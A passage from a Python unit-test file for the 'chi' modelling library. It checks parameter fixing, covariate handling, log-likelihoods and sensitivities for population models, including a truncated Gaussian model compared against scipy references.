eta = [0.2, -0.3, 1, 5]
covariates = np.ones(shape=(4, 2))
ref_psi = self.bare_pop_model.compute_individual_parameters(
parameters, eta, covariates)
psi = self.cpop_model.compute_individual_parameters(
parameters, eta, covariates)
self.assertEqual(psi[0], ref_psi[0])
self.assertEqual(psi[1], ref_psi[1])
self.assertEqual(psi[2], ref_psi[2])
self.assertEqual(psi[3], ref_psi[3])
# Test case II.1: Fix some parameters
self.cpop_model.fix_parameters({
'Base mean log': 1,
'Shift Covariate 1': -1
})
reduced_parameters = [1, 1]
eta = [0.2, -0.3, 1, 5]
covariates = np.ones(shape=(4, 2))
ref_psi = self.bare_pop_model.compute_individual_parameters(
parameters, eta, covariates)
psi = self.cpop_model.compute_individual_parameters(
reduced_parameters, eta, covariates)
self.assertEqual(len(psi), 4)
self.assertEqual(psi[0], ref_psi[0])
self.assertEqual(psi[1], ref_psi[1])
self.assertEqual(psi[2], ref_psi[2])
self.assertEqual(psi[3], ref_psi[3])
# Unfix parameters
self.cpop_model.fix_parameters({
'Base mean log': None,
'Shift Covariate 1': None
})
def test_compute_individual_sensitivities(self):
# Test case I: Model does not transform psi
parameters = [1, 10]
eta = [0.2, -0.3, 1, 5]
psi, sens = self.pop_model.compute_individual_sensitivities(
parameters, eta)
self.assertEqual(len(psi), 4)
self.assertEqual(psi[0], eta[0])
self.assertEqual(psi[1], eta[1])
self.assertEqual(psi[2], eta[2])
self.assertEqual(psi[3], eta[3])
self.assertEqual(sens.shape, (3, 4))
self.assertEqual(sens[0, 0], 1)
self.assertEqual(sens[0, 1], 1)
self.assertEqual(sens[0, 2], 1)
self.assertEqual(sens[0, 3], 1)
self.assertEqual(sens[1, 0], 0)
self.assertEqual(sens[1, 1], 0)
self.assertEqual(sens[1, 2], 0)
self.assertEqual(sens[1, 3], 0)
self.assertEqual(sens[2, 0], 0)
self.assertEqual(sens[2, 1], 0)
self.assertEqual(sens[2, 2], 0)
self.assertEqual(sens[2, 3], 0)
# Test case II: Model transforms psi
# Test case II.1: No fixed parameters
parameters = [1, 1, -1, 1]
eta = [0.2, -0.3, 1, 5]
covariates = np.ones(shape=(4, 2))
ref_psi, ref_sens = \
self.bare_pop_model.compute_individual_sensitivities(
parameters, eta, covariates)
psi, sens = self.cpop_model.compute_individual_sensitivities(
parameters, eta, covariates)
self.assertEqual(len(psi), 4)
self.assertEqual(psi[0], ref_psi[0])
self.assertEqual(psi[1], ref_psi[1])
self.assertEqual(psi[2], ref_psi[2])
self.assertEqual(psi[3], ref_psi[3])
self.assertEqual(sens.shape, (5, 4))
self.assertEqual(sens[0, 0], ref_sens[0, 0])
self.assertEqual(sens[0, 1], ref_sens[0, 1])
self.assertEqual(sens[0, 2], ref_sens[0, 2])
self.assertEqual(sens[0, 3], ref_sens[0, 3])
self.assertEqual(sens[1, 0], ref_sens[1, 0])
self.assertEqual(sens[1, 1], ref_sens[1, 1])
self.assertEqual(sens[1, 2], ref_sens[1, 2])
self.assertEqual(sens[1, 3], ref_sens[1, 3])
self.assertEqual(sens[2, 0], ref_sens[2, 0])
self.assertEqual(sens[2, 1], ref_sens[2, 1])
self.assertEqual(sens[2, 2], ref_sens[2, 2])
self.assertEqual(sens[2, 3], ref_sens[2, 3])
self.assertEqual(sens[3, 0], ref_sens[3, 0])
self.assertEqual(sens[3, 1], ref_sens[3, 1])
self.assertEqual(sens[3, 2], ref_sens[3, 2])
self.assertEqual(sens[3, 3], ref_sens[3, 3])
self.assertEqual(sens[4, 0], ref_sens[4, 0])
self.assertEqual(sens[4, 1], ref_sens[4, 1])
self.assertEqual(sens[4, 2], ref_sens[4, 2])
self.assertEqual(sens[4, 3], ref_sens[4, 3])
# Test case II.2: Fix some parameters
self.cpop_model.fix_parameters({
'Base mean log': 1,
'Shift Covariate 1': -1
})
reduced_parameters = [1, 1]
eta = [0.2, -0.3, 1, 5]
covariates = np.ones(shape=(4, 2))
ref_psi, ref_sens = \
self.bare_pop_model.compute_individual_sensitivities(
parameters, eta, covariates)
psi, sens = self.cpop_model.compute_individual_sensitivities(
reduced_parameters, eta, covariates)
self.assertEqual(len(psi), 4)
self.assertEqual(psi[0], ref_psi[0])
self.assertEqual(psi[1], ref_psi[1])
self.assertEqual(psi[2], ref_psi[2])
self.assertEqual(psi[3], ref_psi[3])
self.assertEqual(sens.shape, (5, 4))
self.assertEqual(sens[0, 0], ref_sens[0, 0])
self.assertEqual(sens[0, 1], ref_sens[0, 1])
self.assertEqual(sens[0, 2], ref_sens[0, 2])
self.assertEqual(sens[0, 3], ref_sens[0, 3])
self.assertEqual(sens[1, 0], ref_sens[1, 0])
self.assertEqual(sens[1, 1], ref_sens[1, 1])
self.assertEqual(sens[1, 2], ref_sens[1, 2])
self.assertEqual(sens[1, 3], ref_sens[1, 3])
self.assertEqual(sens[2, 0], ref_sens[2, 0])
self.assertEqual(sens[2, 1], ref_sens[2, 1])
self.assertEqual(sens[2, 2], ref_sens[2, 2])
self.assertEqual(sens[2, 3], ref_sens[2, 3])
self.assertEqual(sens[3, 0], ref_sens[3, 0])
self.assertEqual(sens[3, 1], ref_sens[3, 1])
self.assertEqual(sens[3, 2], ref_sens[3, 2])
self.assertEqual(sens[3, 3], ref_sens[3, 3])
self.assertEqual(sens[4, 0], ref_sens[4, 0])
self.assertEqual(sens[4, 1], ref_sens[4, 1])
self.assertEqual(sens[4, 2], ref_sens[4, 2])
self.assertEqual(sens[4, 3], ref_sens[4, 3])
# Unfix parameters
self.cpop_model.fix_parameters({
'Base mean log': None,
'Shift Covariate 1': None
})
def test_compute_log_likelihood(self):
# Test case I: fix some parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': 1})
# Compute log-likelihood
parameters = [2]
observations = [2, 3, 4, 5]
score = self.pop_model.compute_log_likelihood(
parameters, observations)
# Compute ref score with original error model
parameters = [1, 2]
error_model = self.pop_model.get_population_model()
ref_score = error_model.compute_log_likelihood(
parameters, observations)
self.assertEqual(score, ref_score)
# Unfix model parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': None})
def test_compute_pointwise_ll(self):
# Test case I: fix some parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': 1})
# Compute log-likelihood
parameters = [2]
observations = [2, 3, 4, 5]
scores = self.pop_model.compute_pointwise_ll(
parameters, observations)
# Compute ref score with original error model
parameters = [1, 2]
error_model = self.pop_model.get_population_model()
ref_scores = error_model.compute_pointwise_ll(
parameters, observations)
self.assertEqual(len(scores), 4)
self.assertEqual(scores[0], ref_scores[0])
self.assertEqual(scores[1], ref_scores[1])
self.assertEqual(scores[2], ref_scores[2])
self.assertEqual(scores[3], ref_scores[3])
# Unfix model parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': None})
def test_compute_sensitivities(self):
# Test case I: fix some parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': 1})
# Compute log-likelihood
parameters = [2]
observations = [2, 3, 4, 5]
score, sens = self.pop_model.compute_sensitivities(
parameters, observations)
# Compute ref score with original error model
parameters = [1, 2]
error_model = self.pop_model.get_population_model()
ref_score, ref_sens = error_model.compute_sensitivities(
parameters, observations)
self.assertEqual(score, ref_score)
self.assertEqual(len(sens), 5)
self.assertEqual(sens[0], ref_sens[0])
self.assertEqual(sens[1], ref_sens[1])
self.assertEqual(sens[2], ref_sens[2])
self.assertEqual(sens[3], ref_sens[3])
self.assertEqual(sens[4], ref_sens[5])
# Unfix model parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': None})
# Compute log-likelihood
score, sens = self.pop_model.compute_sensitivities(
parameters, observations)
self.assertEqual(score, ref_score)
self.assertEqual(len(sens), 6)
self.assertEqual(sens[0], ref_sens[0])
self.assertEqual(sens[1], ref_sens[1])
self.assertEqual(sens[2], ref_sens[2])
self.assertEqual(sens[3], ref_sens[3])
self.assertEqual(sens[4], ref_sens[4])
self.assertEqual(sens[5], ref_sens[5])
def test_fix_parameters(self):
# Test case I: fix some parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': 1})
n_parameters = self.pop_model.n_parameters()
self.assertEqual(n_parameters, 1)
parameter_names = self.pop_model.get_parameter_names()
self.assertEqual(len(parameter_names), 1)
self.assertEqual(parameter_names[0], 'Std. log')
# Test case II: fix overlapping set of parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': 0.2,
'Std. log': 0.1})
n_parameters = self.pop_model.n_parameters()
self.assertEqual(n_parameters, 0)
parameter_names = self.pop_model.get_parameter_names()
self.assertEqual(len(parameter_names), 0)
# Test case III: unfix all parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': None,
'Std. log': None})
n_parameters = self.pop_model.n_parameters()
self.assertEqual(n_parameters, 2)
parameter_names = self.pop_model.get_parameter_names()
self.assertEqual(len(parameter_names), 2)
self.assertEqual(parameter_names[0], 'Mean log')
self.assertEqual(parameter_names[1], 'Std. log')
def test_fix_parameters_bad_input(self):
name_value_dict = 'Bad type'
with self.assertRaisesRegex(ValueError, 'The name-value dictionary'):
self.pop_model.fix_parameters(name_value_dict)
def test_get_population_model(self):
pop_model = self.pop_model.get_population_model()
self.assertIsInstance(pop_model, chi.PopulationModel)
def test_n_covariates(self):
# Test case I: Has no covariates
n = self.pop_model.n_covariates()
self.assertEqual(n, 0)
# Test case II: Has covariates
n = self.cpop_model.n_covariates()
self.assertEqual(n, 2)
def test_n_hierarchical_parameters(self):
# Test case I: fix some parameters
self.pop_model.fix_parameters(name_value_dict={
'Std. log': 0.1})
n_ids = 10
n_indiv, n_pop = self.pop_model.n_hierarchical_parameters(n_ids)
self.assertEqual(n_indiv, 10)
self.assertEqual(n_pop, 1)
# Unfix all parameters
self.pop_model.fix_parameters(name_value_dict={
'Std. log': None})
n_ids = 10
n_indiv, n_pop = self.pop_model.n_hierarchical_parameters(n_ids)
self.assertEqual(n_indiv, 10)
self.assertEqual(n_pop, 2)
def test_n_fixed_parameters(self):
# Test case I: fix some parameters
self.pop_model.fix_parameters(name_value_dict={
'Std. log': 0.1})
self.assertEqual(self.pop_model.n_fixed_parameters(), 1)
# Unfix all parameters
self.pop_model.fix_parameters(name_value_dict={
'Std. log': None})
self.assertEqual(self.pop_model.n_fixed_parameters(), 0)
def test_n_parameters(self):
n_parameters = self.pop_model.n_parameters()
self.assertEqual(n_parameters, 2)
def test_sample(self):
# Test case I: No covariates
self.pop_model.fix_parameters(name_value_dict={
'Mean log': 0.1})
# Sample
seed = 42
n_samples = 4
parameters = [0.2]
samples = self.pop_model.sample(parameters, n_samples, seed)
# Compute ref score with original population model
parameters = [0.1, 0.2]
pop_model = self.pop_model.get_population_model()
ref_samples = pop_model.sample(parameters, n_samples, seed)
self.assertEqual(samples.shape, (4,))
self.assertEqual(ref_samples.shape, (4,))
self.assertEqual(samples[0], ref_samples[0])
self.assertEqual(samples[1], ref_samples[1])
self.assertEqual(samples[2], ref_samples[2])
self.assertEqual(samples[3], ref_samples[3])
# Unfix model parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': None})
# Test case II: Covariates
seed = 42
n_samples = 4
parameters = [1, 1, -1, 1]
covariates = [2, 3]
samples = self.cpop_model.sample(
parameters, n_samples, seed, covariates, return_psi=True)
ref_samples = self.bare_pop_model.sample(
parameters, n_samples, seed, covariates, return_psi=True)
self.assertEqual(samples.shape, (4,))
self.assertEqual(ref_samples.shape, (4,))
self.assertEqual(samples[0], ref_samples[0])
self.assertEqual(samples[1], ref_samples[1])
self.assertEqual(samples[2], ref_samples[2])
self.assertEqual(samples[3], ref_samples[3])
def test_set_get_covariate_names(self):
# Test case I: Has no covariates
names = self.pop_model.get_covariate_names()
self.assertEqual(len(names), 0)
self.pop_model.set_covariate_names(['some', 'names'])
names = self.pop_model.get_covariate_names()
self.assertEqual(len(names), 0)
# Test case II: Has covariates
names = self.cpop_model.get_covariate_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Covariate 1')
self.assertEqual(names[1], 'Covariate 2')
self.cpop_model.set_covariate_names(['some', 'names'])
names = self.cpop_model.get_covariate_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'some')
self.assertEqual(names[1], 'names')
self.cpop_model.set_covariate_names(
['Covariate 1', 'Covariate 2'])
def test_set_get_parameter_names(self):
# Set some parameter names
names = ['Test 1', 'Test 2']
self.pop_model.set_parameter_names(names)
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Test 1')
self.assertEqual(names[1], 'Test 2')
# Reset to defaults
self.pop_model.set_parameter_names(None)
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Mean log')
self.assertEqual(names[1], 'Std. log')
# Fix parameter and set parameter name
self.pop_model.fix_parameters(name_value_dict={
'Mean log': 1})
self.pop_model.set_parameter_names(
['Std. log myokit.tumour_volume'])
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 1)
self.assertEqual(names[0], 'Std. log myokit.tumour_volume')
# Reset to defaults
self.pop_model.set_parameter_names(None)
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 1)
self.assertEqual(names[0], 'Std. log')
# Unfix model parameters
self.pop_model.fix_parameters(name_value_dict={
'Mean log': None})
def test_set_parameter_names_bad_input(self):
# Wrong number of names
names = ['Wrong length']
with self.assertRaisesRegex(ValueError, 'Length of names does not'):
self.pop_model.set_parameter_names(names)
# A parameter exceeds 50 characters
names = [
'0123456789-0123456789-0123456789-0123456789-0123456789-012345678',
'Sigma base']
with self.assertRaisesRegex(ValueError, 'Parameter names cannot'):
self.pop_model.set_parameter_names(names)
def test_transforms_individual_parameters(self):
# Test case I: No transform
self.assertFalse(self.pop_model.transforms_individual_parameters())
# Test case II: Transforms parameters
self.assertTrue(self.cpop_model.transforms_individual_parameters())
class TestTruncatedGaussianModel(unittest.TestCase):
"""
Tests the chi.TruncatedGaussianModel class.
"""
@classmethod
def setUpClass(cls):
cls.pop_model = chi.TruncatedGaussianModel()
def test_compute_log_likelihood(self):
# Hard to test exactly, but at least test some edge cases where
# loglikelihood is straightforward to compute analytically
n_ids = 10
# Test case I: psis = 1, mu = 1, sigma = 1
# Score reduces to
# -nids * (np.log(2pi)/2 + np.log(1 - Phi(-1)))
# Test case I.1:
psis = [1] * n_ids
mu = 1
sigma = 1
ref_score1 = - n_ids * (
np.log(2*np.pi) / 2 + np.log(1 - norm.cdf(-mu/sigma)))
a = (0 - mu) / sigma
ref_score2 = np.sum(truncnorm.logpdf(
psis, a=a, b=np.inf, loc=mu, scale=sigma))
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score1)
self.assertAlmostEqual(score, ref_score2)
# Test case I.2:
psis = [5] * n_ids
mu = 5
sigma = 1
ref_score1 = - n_ids * (
np.log(2*np.pi) / 2 + np.log(1 - norm.cdf(-mu/sigma)))
a = (0 - mu) / sigma
ref_score2 = np.sum(truncnorm.logpdf(
psis, a=a, b=np.inf, loc=mu, scale=sigma))
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score1)
self.assertAlmostEqual(score, ref_score2)
# Test case II: psis != mu, sigma = 1.
# Score reduces to
# -nids * (np.log(2pi)/2 + (psi - mu)^2/2 + np.log(1 - Phi(-mu)))
# Test case II.1:
psis = [2] * n_ids
mu = 1
sigma = 1
ref_score1 = - n_ids * (
np.log(2*np.pi) / 2 +
(psis[0] - mu)**2 / 2 +
np.log(1 - norm.cdf(-mu/sigma)))
a = (0 - mu) / sigma
ref_score2 = np.sum(truncnorm.logpdf(
psis, a=a, b=np.inf, loc=mu, scale=sigma))
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score1)
self.assertAlmostEqual(score, ref_score2)
# Test case II.2:
psis = [2] * n_ids
mu = 10
sigma = 1
ref_score1 = - n_ids * (
np.log(2*np.pi) / 2 +
(psis[0] - mu)**2 / 2 +
np.log(1 - norm.cdf(-mu/sigma)))
a = (0 - mu) / sigma
ref_score2 = np.sum(truncnorm.logpdf(
psis, a=a, b=np.inf, loc=mu, scale=sigma))
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score1)
self.assertAlmostEqual(score, ref_score2)
# Test case III: Any parameters
# Test case III.1
psis = np.arange(10)
mu = 1
sigma = 1
a = (0 - mu) / sigma
ref_score = np.sum(truncnorm.logpdf(
psis, a=a, b=np.inf, loc=mu, scale=sigma))
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case III.2
psis = np.arange(10)
mu = 10
sigma = 15
a = (0 - mu) / sigma
ref_score = np.sum(truncnorm.logpdf(
psis, a=a, b=np.inf, loc=mu, scale=sigma))
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case IV: mu and sigma negative or zero
# Test case IV.1
psis = [np.exp(10)] * n_ids
mu = 0
sigma = 1
parameters = [mu] + [sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(score, -np.inf)
# Test case IV.2
psis = [np.exp(10)] * n_ids
mu = 1
sigma = 0
parameters = [mu] + [sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(score, -np.inf)
# Test case IV.3
psis = [np.exp(10)] * n_ids
mu = -1
sigma = 1
parameters = [mu] + [sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(score, -np.inf)
# Test case IV.4
psis = [np.exp(10)] * n_ids
mu = 1
sigma = -1
parameters = [mu] + [sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(score, -np.inf)
def test_compute_pointwise_ll(self):
# Test case I.1:
psis = np.arange(10)
mu = 1
sigma = 1
a = (0 - mu) / sigma
ref_scores = truncnorm.logpdf(
psis, a=a, b=np.inf, loc=mu, scale=sigma)
parameters = [mu, sigma]
pw_scores = self.pop_model.compute_pointwise_ll(parameters, psis)
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(len(pw_scores), 10)
self.assertAlmostEqual(np.sum(pw_scores), score)
self.assertAlmostEqual(pw_scores[0], ref_scores[0])
self.assertAlmostEqual(pw_scores[1], ref_scores[1])
self.assertAlmostEqual(pw_scores[2], ref_scores[2])
self.assertAlmostEqual(pw_scores[3], ref_scores[3])
self.assertAlmostEqual(pw_scores[4], ref_scores[4])
self.assertAlmostEqual(pw_scores[5], ref_scores[5])
self.assertAlmostEqual(pw_scores[6], ref_scores[6])
self.assertAlmostEqual(pw_scores[7], ref_scores[7])
self.assertAlmostEqual(pw_scores[8], ref_scores[8])
self.assertAlmostEqual(pw_scores[9], ref_scores[9])
# Test case I.2:
psis = np.linspace(3, 5, 10)
mu = 2
sigma = 4
a = (0 - mu) / sigma
ref_scores = truncnorm.logpdf(
psis, a=a, b=np.inf, loc=mu, scale=sigma)
parameters = [mu, sigma]
pw_scores = self.pop_model.compute_pointwise_ll(parameters, psis)
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(len(pw_scores), 10)
self.assertAlmostEqual(np.sum(pw_scores), score)
self.assertAlmostEqual(pw_scores[0], ref_scores[0])
self.assertAlmostEqual(pw_scores[1], ref_scores[1])
self.assertAlmostEqual(pw_scores[2], ref_scores[2])
self.assertAlmostEqual(pw_scores[3], ref_scores[3])
self.assertAlmostEqual(pw_scores[4], ref_scores[4])
self.assertAlmostEqual(pw_scores[5], ref_scores[5])
self.assertAlmostEqual(pw_scores[6], ref_scores[6])
self.assertAlmostEqual(pw_scores[7], ref_scores[7])
self.assertAlmostEqual(pw_scores[8], ref_scores[8])
self.assertAlmostEqual(pw_scores[9], ref_scores[9])
# Test case IV: mu_log or sigma_log negative or zero
# Test case IV.1
psis = [np.exp(10)] * 3
mu = 1
sigma = 0
parameters = [mu] + [sigma]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(scores[0], -np.inf)
self.assertEqual(scores[1], -np.inf)
self.assertEqual(scores[2], -np.inf)
# Test case IV.2
psis = [np.exp(10)] * 3
mu = 1
sigma = -10
parameters = [mu] + [sigma]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(scores[0], -np.inf)
self.assertEqual(scores[1], -np.inf)
self.assertEqual(scores[2], -np.inf)
def test_compute_sensitivities(self):
n_ids = 10
# Test case I: psis = mu, sigma = 1
# Sensitivities reduce to
# dpsi = 0
# dmu = - phi(mu) * nids / (1 - Phi(-mu))
# dsigma = -n_ids + phi(mu) * mu * nids / (1 - Phi(-mu))
# Test case I.1:
psis = [1] * n_ids
mu = 1
sigma = 1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = 0
ref_dmu = -norm.pdf(mu) * n_ids / (1 - norm.cdf(-mu))
ref_dsigma = -n_ids + norm.pdf(mu) * mu * n_ids / (1 - norm.cdf(-mu))
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case I.2:
psis = [10] * n_ids
mu = 10
sigma = 1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = 0
ref_dmu = -norm.pdf(mu) * n_ids / (1 - norm.cdf(-mu))
ref_dsigma = -n_ids + norm.pdf(mu) * mu * n_ids / (1 - norm.cdf(-mu))
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case II: psis != mu, sigma = 1
# Sensitivities reduce to
# dpsi = mu - psi
# dmu = psi - mu - phi(mu) * nids / (1 - Phi(-mu))
# dsigma = (psi - mu)^2 - phi(mu) * mu * nids / (1 - Phi(-mu))
# Test case II.1:
psis = np.array([1] * n_ids)
mu = 10
sigma = 1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = mu - psis[0]
ref_dmu = \
np.sum(psis - mu) \
- norm.pdf(mu) * n_ids / (1 - norm.cdf(-mu))
ref_dsigma = \
- n_ids + np.sum((psis - mu)**2) \
+ norm.pdf(mu) * mu * n_ids / (1 - norm.cdf(-mu))
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case II.2:
psis = np.array([7] * n_ids)
mu = 5
sigma = 1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = mu - psis[0]
ref_dmu = \
np.sum(psis - mu) \
- norm.pdf(mu) * n_ids / (1 - norm.cdf(-mu))
ref_dsigma = \
- n_ids + np.sum((psis - mu)**2) \
+ norm.pdf(mu) * mu * n_ids / (1 - norm.cdf(-mu))
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case III: psis != mu, sigma != 1
# Sensitivities reduce to
# dpsi = (mu - psi) / sigma^2
# dmu =
# (psi - mu - phi(mu/sigma) * nids / (1 - Phi(-mu/sigma))) / sigma
# dsigma =
# -nids / sigma
# + (psi - mu)^2 / sigma^3
# + phi(mu) * mu * nids / (1 - Phi(-mu)) / sigma^2
# Test case III.1:
psis = np.array([1] * n_ids)
mu = 10
sigma = 2
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = (mu - psis[0]) / sigma**2
ref_dmu = (
np.sum(psis - mu) / sigma
- norm.pdf(mu/sigma) * n_ids / (1 - norm.cdf(-mu/sigma))
) / sigma
ref_dsigma = (
-n_ids + np.sum((psis - mu)**2) / sigma**2
+ norm.pdf(mu/sigma) * mu / sigma * n_ids /
(1 - norm.cdf(-mu/sigma))
) / sigma
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma, 5)
# Test case III.2:
psis = np.array([7] * n_ids)
mu = 0.5
sigma = 0.1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = (mu - psis[0]) / sigma**2
ref_dmu = (
np.sum(psis - mu) / sigma
- norm.pdf(mu/sigma) * n_ids / (1 - norm.cdf(-mu/sigma))
) / sigma
ref_dsigma = (
-n_ids + np.sum((psis - mu)**2) / sigma**2
+ norm.pdf(mu/sigma) * mu / sigma * n_ids /
(1 - norm.cdf(-mu/sigma))
) / sigma
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case IV: Compare gradients to numpy.gradient
epsilon = 0.001
n_parameters = n_ids + self.pop_model.n_parameters()
parameters = np.ones(shape=n_parameters)
ref_sens = []
for index in range(n_parameters):
# Construct parameter grid
low = parameters.copy()
low[index] -= epsilon
high = parameters.copy()
high[index] += epsilon
# Compute reference using numpy.gradient
sens = np.gradient(
[
self.pop_model.compute_log_likelihood(
low[n_ids:], low[:n_ids]),
self.pop_model.compute_log_likelihood(
parameters[n_ids:], parameters[:n_ids]),
self.pop_model.compute_log_likelihood(
high[n_ids:], high[:n_ids])],
(epsilon))
ref_sens.append(sens[1])
# Compute sensitivities with hierarchical model
_, sens = self.pop_model.compute_sensitivities(
parameters[n_ids:], parameters[:n_ids])
self.assertEqual(len(sens), 12)
self.assertEqual(sens[0], ref_sens[0])
self.assertEqual(sens[1], ref_sens[1])
self.assertEqual(sens[2], ref_sens[2])
self.assertEqual(sens[3], ref_sens[3])
